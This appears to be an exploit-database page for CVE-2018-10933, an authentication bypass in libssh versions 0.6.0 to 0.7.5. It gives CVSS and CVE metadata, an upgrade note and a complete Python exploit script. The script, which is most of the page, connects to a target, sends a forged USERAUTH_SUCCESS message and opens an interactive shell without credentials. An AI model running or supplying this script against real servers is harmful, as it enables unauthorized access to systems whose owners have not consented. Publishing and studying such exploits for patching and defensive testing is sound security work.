header-logo
Suggest Exploit
vendor:
libssh
by:
Anonymous
7.5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: libssh
Affected Version From: 0.6.0
Affected Version To: 0.7.5
Patch Exists: YES
Related CWE: CVE-2018-10933
CPE: a:libssh:libssh:0.6.0
Metasploit: https://www.rapid7.com/db/vulnerabilities/alpine-linux-cve-2018-10933/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp3-cve-2018-10933/https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2018-10933/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2018-10933/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2018-10933/https://www.rapid7.com/db/vulnerabilities/libssh-cve-2018-10933/https://www.rapid7.com/db/vulnerabilities/suse-cve-2018-10933/https://www.rapid7.com/db/vulnerabilities/debian-cve-2018-10933/
Other Scripts: N/A
Platforms Tested: Linux, Mac, Windows
2019

libSSH Authentication Bypass

This exploit allows an attacker to bypass authentication on libSSH servers without credentials. It works by sending a message with the USERAUTH_SUCCESS flag to the server, which will then allow the attacker to open a session and invoke a shell.

Mitigation:

Upgrade to libSSH version 0.7.6 or later.
Source

Exploit-DB raw data:

#!/usr/bin/env python3
import paramiko
import socket
import argparse
from sys import argv, exit


parser = argparse.ArgumentParser(description="libSSH Authentication Bypass")
parser.add_argument('--host', help='Host')
parser.add_argument('-p', '--port', help='libSSH port', default=22)
parser.add_argument('-log', '--logfile', help='Logfile to write conn logs', default="paramiko.log")

args = parser.parse_args()


def BypasslibSSHwithoutcredentials(hostname, port):
    
    sock = socket.socket()
    try:
        sock.connect((str(hostname), int(port)))

        message = paramiko.message.Message()
        transport = paramiko.transport.Transport(sock)
        transport.start_client()
  
        message.add_byte(paramiko.common.cMSG_USERAUTH_SUCCESS)
        transport._send_message(message)
    
        spawncmd = transport.open_session()
        spawncmd.invoke_shell()
        return 0
    
    except paramiko.SSHException as e:
        print("TCPForwarding disabled on remote/local server can't connect. Not Vulnerable")
        return 1
    except socket.error:
        print("Unable to connect.")
        return 1


def main():
    paramiko.util.log_to_file(args.logfile)
    try:
        hostname = args.host
        port = args.port
    except:
        parser.print_help()
        exit(1)
    BypasslibSSHwithoutcredentials(hostname, port)

if __name__ == '__main__':
    exit(main())

Navigation

Suggest Exploit

Services By CQR